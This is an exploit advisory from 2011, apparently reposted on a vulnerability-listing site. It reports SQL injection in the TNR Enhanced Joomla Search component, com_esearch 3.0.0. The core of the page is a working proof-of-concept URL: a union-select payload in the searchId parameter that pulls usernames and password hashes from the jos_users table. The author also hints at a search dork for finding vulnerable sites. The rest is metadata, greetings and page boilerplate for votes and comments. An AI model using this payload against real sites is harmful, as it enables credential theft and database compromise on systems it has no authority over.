TNR Enhanced Joomla Search 3.0.0 SQL Injection

2011.08.10

Credit: NoGe

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

=========================================================================================
  
  [o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability
   
       Software : com_esearch ver 3.0.0
       Vendor   : http://www.tnrjoomla.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Home     : http://evilc0de.blogspot.com/
 
=========================================================================================
 
  [o] Exploit
  
       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]
 
  [o] PoC
 
       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
 
  [o] Dork
 
       u all know what the dork is right? :))
 
=========================================================================================
 
  [o] Greetz
 
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe matthews wishnusakti kaka11 inc0mp13te martfella
       pizzyroot Genex H312Y }^-^{ noname tukulesto
 
=========================================================================================
 
  [o] August 07 2011 - Papua, Indonesia

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

TNR Enhanced Joomla Search 3.0.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.